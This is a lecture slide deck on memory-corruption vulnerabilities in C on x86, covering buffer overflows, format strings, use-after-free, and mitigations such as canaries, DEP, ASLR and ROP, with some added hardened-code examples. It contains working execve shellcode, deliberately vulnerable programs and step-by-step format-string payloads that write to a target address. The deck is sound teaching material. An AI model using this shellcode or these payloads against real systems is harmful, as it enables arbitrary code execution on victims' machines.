SLIDE 1

HOWTO Basic Vulnerabilities and their Exploitation

Samuel Angebault

staphylo@lse.epita.fr http://lse.epita.fr/

July 18, 2013

SLIDE 2

Table of contents

1. Reminders
2. Vulnerabilities: Buffer Overflow, Off by One, Out of bound, Heap Overflow, Format String, Use after free
3. Security: Canary, DEP, ASLR

SLIDE 3

Plan

1. Reminders

SLIDE 4

Push & Pop

SLIDE 5

Stack frame

SLIDE 6

Function call

Instruction

    call func

Equivalent

    push %eip + 2
    jmp func

SLIDE 7

Function return

Instruction

    ret

Equivalent

    pop %eip

SLIDE 8

Shared libraries

  • PIC (Position Independent Code)
  • Addresses in the library are relative
  • The libraries can be mapped anywhere in the address space
  • Library addresses can no longer be found by static analysis alone, so an exploit cannot hardcode them

SLIDE 9

GOT PLT

  • GOT (Global Offset Table)
  • PLT (Procedure Linkage Table)

SLIDE 10

GOT PLT

SLIDE 11

Plan

2. Vulnerabilities

SLIDE 12

Buffer Overflow

  • a buffer is allocated
  • not necessarily on the stack
  • more data is written than the size of the buffer
  • the data that follows the buffer is overwritten

SLIDE 13

Stack view

SLIDE 14

Jumping somewhere else

  • controlling %eip
  • replacing the return address with another one

SLIDE 15

Stack view

SLIDE 16

Spawning a shell

  • raw code
  • writing shellcode for the exploit
      • shell
      • reverse shell
      • ...
  • filling the buffer with the shellcode
  • overriding the return address to jump to your code
  • shellcode often has to respect constraints
      • no null byte
      • ascii
      • ...

SLIDE 17

Stack view

SLIDE 18

Code example

    #include <stdio.h>
    #include <string.h>

    static void success(void)
    {
        puts("you jumped successfully");
    }

    static void test(const char *input)
    {
        char buffer[40];
        strcpy(buffer, input);
    }

    int main(int argc, char *argv[])
    {
        if (argc != 2) return 1;
        test(argv[1]);
        return 0;
    }
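
As an added example (not part of the slides), the same test() with the unbounded strcpy() replaced by a length-checked copy that refuses input which does not fit in the 40-byte buffer; copy_bounded and test_safe are hypothetical names.

```c
#include <stddef.h>
#include <string.h>

#define BUF_SIZE 40   /* same size as buffer[] in the slide's test() */

/* Copies input into dst only when it fits, terminator included.
 * Returns 1 on success; returns 0 and leaves dst empty when the input is
 * too long, so the caller learns that it was rejected instead of having
 * the bytes past buffer[] silently overwrite the saved frame pointer and
 * return address as strcpy() does on the slide. */
static int copy_bounded(char *dst, size_t dst_size, const char *input)
{
    size_t len = 0;
    if (dst_size == 0)
        return 0;
    /* Measure without ever reading more than dst_size bytes of input. */
    while (len < dst_size && input[len] != '\0')
        len++;
    if (len == dst_size) {        /* no room left for the NUL */
        dst[0] = '\0';
        return 0;
    }
    memcpy(dst, input, len + 1);  /* len < dst_size, so this stays in bounds */
    return 1;
}

/* Hardened counterpart of the slide's test(). */
static int test_safe(const char *input)
{
    char buffer[BUF_SIZE];
    return copy_bounded(buffer, sizeof buffer, input);
}

int main(int argc, char *argv[])
{
    if (argc != 2)
        return 1;
    /* Exit status 2 reports "input rejected" instead of a corrupted stack. */
    return test_safe(argv[1]) ? 0 : 2;
}
```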

SLIDE 19

The shellcode

C equivalent

    execve("/bin/sh", 0, 0);

    add $0x42, %esp         # moving stack pointer
    xor %eax,%eax           # eax = 0
    # pushing "/bin//sh" onto the stack
    push %eax               # push '\0'
    push $0x68732f2f        # hs//
    push $0x6e69622f        # nib/
    # setting registers for syscall
    mov %esp,%ebx           # ebx = filename
    mov %eax,%ecx           # ecx = NULL (argv)
    mov %eax,%edx           # edx = NULL (envp)
    # putting syscall number in eax
    mov $0xb,%al            # eax = __NR_execve 11
    int $0x80               # making syscall

SLIDE 20

ret2reg

  • one of the registers contains the address we want
  • call through the content of that register
  • no hardcoded address

SLIDE 21

ret2reg

%eax contains the address of the buffer (return value of strcpy). We can call the address in %eax to execute our shellcode.

Searching for a call to %eax

    $ objdump -D ./stack | grep -E "call +\*%eax"
    8048396: ff d0   call *%eax
    804841f: ff d0   call *%eax

The return address can be overwritten with one of those.

SLIDE 22

ret2libc

  • call a function of the libc by using its address as the return address
  • set up the stack in order to call the function

SLIDE 23

Stack View

SLIDE 24

Off by One

  • coding error
  • a loop iterates one time too many
  • a read or a write, depending on the case

SLIDE 25

Example

Code

    char buffer[20];
    for (int i = 0; i <= 20; ++i)
        buffer[i] = getchar();

SLIDE 26

Out of bound

  • error in bounds checking
  • write what where
  • read where

SLIDE 27

Write What Where

Code

    void test(const char *input, int *array, int size)
    {
        int i = atoi(input);
        if (i >= size)
            return;
        array[i] = 0;
    }
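
An added example (not the deck's code) that serves both the off-by-one loop from the "Example" slide and the bounds check above: the loop with its condition corrected, the slide's check isolated to show that a negative index passes it, and a hardened version that parses strictly and checks both bounds. All function names are hypothetical and the inputs are constructed strings.

```c
#include <errno.h>
#include <limits.h>
#include <stdlib.h>

#define BUF_SIZE 20

/* Off by one: the slide's `for (int i = 0; i <= 20; ++i)` runs 21 times for a
 * 20-byte buffer, so the last iteration writes one byte past the end.
 * The corrected loop uses `<`; the input comes from a string here (constructed
 * for offline checking) instead of getchar(). Returns the bytes stored. */
static int fill_fixed(char *buffer, const char *src)
{
    int i;
    for (i = 0; i < BUF_SIZE && src[i] != '\0'; ++i)
        buffer[i] = src[i];
    return i;   /* never exceeds BUF_SIZE */
}

/* The slide's check in isolation: it only rejects i >= size, so a negative
 * index such as atoi("-1") is accepted and array[i] = 0 writes before the
 * array (the "write what where"). Returns 1 when the index is accepted. */
static int slide_check_accepts(int i, int size)
{
    return !(i >= size);
}

/* Strict decimal parse: whole string consumed, no overflow, unlike atoi(),
 * which reports neither. Returns 1 on success. */
static int parse_index(const char *input, int *out)
{
    char *end;
    long v;
    errno = 0;
    v = strtol(input, &end, 10);
    if (end == input || *end != '\0' || errno == ERANGE || v < INT_MIN || v > INT_MAX)
        return 0;
    *out = (int)v;
    return 1;
}

/* Hardened write: both bounds are checked. Returns 0 on success,
 * -1 when input is not a valid integer, -2 when it is out of range. */
static int set_zero_safe(const char *input, int *array, int size)
{
    int i;
    if (!parse_index(input, &i))
        return -1;
    if (i < 0 || i >= size)
        return -2;
    array[i] = 0;
    return 0;
}
```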

SLIDE 28

Heap Overflow

  • Depending on malloc implementation
  • Case dependent

SLIDE 29

Heap view

SLIDE 30

Reminders on printf

Prototype

    int printf(const char *fmt, ...);

  • the *printf functions take variadic parameters
  • all the parameters are pushed on the stack

SLIDE 31

exploiting printf

  • coding error (the format string is taken from the input)
  • %n writes the number of bytes printed so far at the given address
  • %hhn writes 1 byte, %hn 2 bytes, %n 4 bytes
  • %08x prints a 4-byte value as 8 hexadecimal digits

SLIDE 32

Format String

SLIDE 33

%n example

Code

    int count = 0;
    printf("Hello World%n !!!\n", &count);
    printf("count = %d\n", count);

Output

    Hello World !!!
    count = 11

SLIDE 34

%n example

Code

    int count = 0;
    printf("%.20u%n !!!\n", 0, &count);
    printf("count = %d\n", count);

Output

    ...................0 !!!
    count = 20

SLIDE 35

Example

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>

    int target = 0;

    static void test(const char *input)
    {
        printf(input);
        if (target)
            puts("success !");
    }

    int main(int argc, char *argv[])
    {
        if (argc != 2) return 1;
        test(argv[1]);
        return 0;
    }

SLIDE 36

Exploiting

Input

Hello World !!!

Output

Hello World !!!

SLIDE 37

Crashing the program

Input

%s%s%s%s%s%s%s%s%s

Output

Segmentation Fault (SIGSEGV)

SLIDE 38

Displaying the stack

Input

%08X %08X %08X %08X ...

Output

0000002F 08049728 080484E2 00000002 FFFFD574 ...

SLIDE 39

Searching the buffer

Input

AAAA %08X %08X %08X ... %08X %08X %08X

Output

AAAA 0000002F 08049728 080484E2 ... 41414141 38302520 30252058

SLIDE 40

GNU extension

Positional parameter

%index$operand

Input

AAAA %156$08X

Output

AAAA 41414141

SLIDE 41

Setting the address

Address of target

    $ nm --defined-only ./a.out | grep target
    08049750 B target

Input

\x50\x97\x04\x08 %156$X

Output

08049750

SLIDE 42

Writing at the address

Input

\x50\x97\x04\x08 %156$n

Output

success !

SLIDE 43

Precise value

Code

if (target == 13) puts("success !");

Input

\x50\x97\x04\x08 %.8u%156$n

SLIDE 44

Usage

  • change conditional jump
  • leak a value
  • rewrite a function address (especially in the GOT)
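
An added example (not from the slides) covering the format string section: a scanner that classifies a user-controlled string by what it would do as a printf format (read conversions leak the stack, %n writes memory), beside the slide's test() rewritten to pass the input as a %s argument. Function names are hypothetical.

```c
#include <stdio.h>
#include <string.h>

/* Walks printf conversions (%[flags][width][.precision][length]conv), the
 * "%%" escape and the GNU positional form %N$... shown on the slides. Returns
 * how many conversions consume an argument and sets *writes when any of them
 * is %n, whatever its length modifier: a memory write, not a stack read. */
static int scan_format(const char *s, int *writes)
{
    int conversions = 0;
    *writes = 0;
    for (; *s != '\0'; s++) {
        if (*s != '%')
            continue;
        s++;
        if (*s == '%')        /* "%%" prints a literal '%' */
            continue;
        /* position (N$), flags, width, precision */
        while (*s != '\0' && strchr("0123456789$*-+ #.", *s))
            s++;
        /* length modifiers: hh, h, l, ll, L, q, j, z, t */
        while (*s != '\0' && strchr("hlLqjzt", *s))
            s++;
        if (*s == '\0')       /* truncated specification at end of string */
            break;
        conversions++;
        if (*s == 'n')
            *writes = 1;
    }
    return conversions;
}

/* Classifies a user-influenced string the way the slides walk through it:
 * 0 = plain text, 1 = read conversions only (leaks the stack, as in
 * "Displaying the stack"), 2 = contains %n (writes memory, as in "Writing at
 * the address"). Anything but 0 must never reach printf as the format. */
static int classify_format(const char *fmt)
{
    int writes;
    int n = scan_format(fmt, &writes);
    if (writes)
        return 2;
    return n > 0 ? 1 : 0;
}

static int target = 0;

/* The slide's test() hardened: the input is an argument of a fixed format, so
 * "%n" inside it is printed as text and target cannot be modified. */
static int test_hardened(const char *input)
{
    printf("%s\n", input);
    return target;   /* still 0 after any input */
}
```

gcc's -Wformat -Wformat-security reports printf(input) at compile time; the scanner is for the run-time case where a string must be rejected before it can become a format argument.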

SLIDE 45

Use after free

  • resource dynamically allocated
  • freed before the end of its usage
  • it is really case dependent
      • malloc implementation
      • how the use after free is used

SLIDE 46

Dummy translation

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>

    typedef void (*func_f)(void);

    func_f *callback;

    static void success(void) {
        puts("you win");
    }

    static void lose(void) {
        puts("you lose");
    }

    int main(int argc, char *argv[]) {
        if (argc == 1) return 1;

        callback = malloc(256);
        *callback = lose;
        free(callback);

        char *tmp = malloc(256);
        memset(tmp, 0, 256);
        strncpy(tmp, argv[1], 255);
        printf("%s\n", tmp);
        free(tmp);

        (*callback)();
        return 0;
    }
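
An added example (not the slide's program) with the lifetime bug removed: the callback chunk is freed only after its last use, the releasing helper nulls the pointer, and invoking through a NULL slot is refused. Names are hypothetical and outcome is a constructed variable so the result can be checked offline.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

typedef void (*func_f)(void);

static int outcome = 0;   /* records which callback ran, checkable offline */

static void lose(void) { outcome = 2; puts("you lose"); }

/* free() the chunk and clear the owner's pointer in one step, so nothing can
 * reach the chunk once the allocator may have handed it to another malloc(). */
static void release_callback(func_f **slot)
{
    free(*slot);
    *slot = NULL;
}

/* Refuses a NULL slot with -1 instead of calling through whatever the freed
 * chunk now holds; otherwise runs the stored function and returns 0. */
static int invoke_callback(func_f *cb)
{
    if (cb == NULL)
        return -1;
    (*cb)();
    return 0;
}

/* The slide's steps in the right order: the user string is copied and printed
 * while the callback is still owned, and the callback is released only after
 * its last use. Returns 0 on success, -2 on allocation failure, -3 if a call
 * after release were ever accepted (it is not). */
static int run(const char *arg)
{
    int rc;
    func_f *callback = malloc(sizeof *callback);
    char *tmp = malloc(256);
    if (callback == NULL || tmp == NULL) {
        free(callback); free(tmp);
        return -2;
    }
    *callback = lose;
    memset(tmp, 0, 256);
    strncpy(tmp, arg, 255);
    printf("%s\n", tmp);
    free(tmp);
    rc = invoke_callback(callback);
    release_callback(&callback);
    if (invoke_callback(callback) != -1)
        return -3;
    return rc;
}
```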

SLIDE 47

Plan

3. Security

SLIDE 48

Canary (Stack Protection)

  • random value defined at run time
  • pushed just before the return address
  • checked before returning from the function

SLIDE 49

DEP (Data Execution Prevention)

It is also known as:

  • NX bit (Never eXecute)
  • Intel XD bit (eXecute Disabled)
  • AMD EVP (Enhanced Virus Protection)
  • ARM XN bit (eXecute Never)
  • OpenBSD W^X (Write XOR eXecute)

It simply means that you can no longer execute code on the stack. It is enabled by default on modern OSes.

SLIDE 50

ROP

ROP (Return Oriented Programming)

  • push values and return addresses
  • set up registers and stack
  • function call (mprotect)
  • syscall
  • ...

SLIDE 51

Gadget

  • a gadget ends with ret
  • search the binary for the instruction sequence you need
  • x86 instructions are not aligned, so decoding from a different byte offset yields different instructions

Gadget

    80 cd 80 : or $0x80,%ch
       cd 80 : int $0x80
    0b 58 c3 : or -0x3d(%eax),%ebx
       58 c3 : pop %eax; ret

SLIDE 52

Stack View

SLIDE 53

ASLR

  • ASLR (Address Space Layout Randomisation)
  • enabled by default on modern OSes
  • can be brute-forced on 32 bits
  • almost impossible to brute-force on 64 bits
  • additional protections against brute force exist

SLIDE 54

Bypass

  • Leak an address
  • Pivot
  • Nop spray

SLIDE 55

NOP Spray

  • nop sled, nop slide, nop ramp
  • nop (No OPeration)
  • can be done with other opcodes
  • fill the area with NOPs and put the shellcode at the end
  • try a random address to jump into
  • increases the chances of success

SLIDE 56

Memory view

SLIDE 57

Questions ?

Thank you for your attention

Links

  • http://www.exploit-exercises.com/